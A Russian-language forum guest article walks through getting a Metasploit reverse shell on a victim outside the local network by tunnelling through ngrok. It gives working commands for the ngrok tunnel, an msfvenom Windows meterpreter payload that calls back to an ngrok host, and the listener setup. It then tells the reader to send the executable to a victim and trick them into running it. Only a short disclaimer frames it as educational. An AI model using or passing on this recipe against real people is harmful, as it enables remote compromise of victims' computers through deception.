• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Гостевая статья Metasploit без переадресации портов - вне локальной сети через Интернет

Metasploit - одна из лучших сред тестирования безопасности, которая помогает тестировщикам делать больше, чем просто обнаруживать проблемы и выявлять уязвимости; он также готовится и вооружает защитников, чтобы всегда оставаться на один или два шага впереди игры.

Metasploit Framework - это набор инструментов для генерации и запуска кодов эксплойтов на локальном или удаленном целевом компьютере. В Интернете существуют тонны учебников по использованию различных уязвимостей. Но большинство из них ограничены в локальной сети. Чтобы сделать что-то полезное, один из них выходит за пределы локальной сети.

Большинство наших машин не будут напрямую доступны из Интернета, так как они находятся в локальной сети за маршрутизатором. По умолчанию он не разрешает входящий трафик из Интернета в локальную сеть. Для этого необходимо включить перенаправление портов. Порт. Пересылка - это механизм, который используется для перенаправления соединения с внешнего устройства для доступа к службам на устройстве в локальных сетях / частных сетях. Для этого вам следует настроить маршрутизатор, что может быть невозможно, если вы находитесь в офисной сети. Так что с этим делать?

Что если я скажу вам, что мы могли бы перенаправить соединение из Интернета на компьютер в частной / локальной сети без добавления правил брандмауэра или переадресации портов?

Metasploit вне локальной сети без переадресации портов
В этом посте мы обсудим атаку на устройство с помощью metasploit framework, чтобы установить обратное TCP-соединение с устройства жертвы на нашу локальную машину без переадресации портов.

Шаг 1 - Настройка Ngrok
ngrok - это удивительный сервис, позволяющий нам установить соединение с машиной или службой, работающей на машине, которая находится внутри локальной сети или расположена через Интернет без переадресации портов или добавления каких-либо правил брандмауэра. Это поможет нам подключить нашу машину-жертву для установления обратного TCP-соединения с нашим слушателем, даже если наша машина находится в нашей локальной сети.

Первое, что нужно сделать, это установить и настроить ngrok на нашей машине Kali. Для этого выполните шаги 1, 2 и 3 в следующем уроке. Вы можете сделать намного больше, используя Ngrok.

Шаг 2 - Запуск Ngrok
Теперь давайте запустим ngrok на TCP-порте; скажем, 9999. Слушатель Metasploit будет прослушивать порт 9999 для входящих обратных соединений TCP.
Код:
./ngrok tcp 9999
unnamed.jpg


Как только вы выполните эту команду, вы увидите нечто вроде этого:
Forwarding tcp://0.tcp.ngrok.io:19631 -> localhost:9999

Это означает, что весь трафик 0.tcp.ngrok.io через порт 19631 через Интернет будет перенаправлен ngrok на порт 9999 на нашей машине. Оставь это работающим.

Шаг 3 - Создание полезной нагрузки
Теперь запустите другой терминал и создайте полезную нагрузку с вышеупомянутыми LPORT и LHOST. Используйте приведенную ниже команду для ее создания.

msfvenom -p windows / meterpreter / reverse_tcp LHOST = 0.tcp.ngrok.io LPORT = 19631 -f exe> payload.exe
unnamed (1).jpg

Здесь я использовал полезную нагрузку windows, но вы можете создать полезную нагрузку для любой ОС, включая android, предоставив вышеупомянутые LHOST и LPORT.

Шаг 4 - Запустите Metasploit Listener
Как только полезная нагрузка сгенерирована, вы можете запустить metasploit и настроить прослушиватель с помощью приведенных ниже команд.
Код:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 9999
exploit
unnamed (2).jpg

Как только вы запустите 'эксплойт', metasploit запустит прослушиватель на порту 9999 на вашей машине, который будет следить за любым входящим обратным TCP-соединением.

Шаг 5 - Запустите полезную нагрузку
Теперь все, что вам нужно сделать, это отправить этот файл своей жертве, которая работает на компьютере с Windows, и обманом заставить его открыть файл.
unnamed (3).jpg

Вы получили оболочку ...

Отказ от ответственности: это только для образовательных целей. Любые действия и / или действия, связанные с материалами, содержащимися на этом веб-сайте, являются исключительно вашей ответственностью. Неправильное использование информации на этом веб-сайте может привести к уголовным обвинениям против указанных лиц. Авторы не будут нести ответственность в случае предъявления каких-либо уголовных обвинений лицам, злоупотребляющим информацией на этом веб-сайте, чтобы нарушить закон.
 
Последнее редактирование:
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!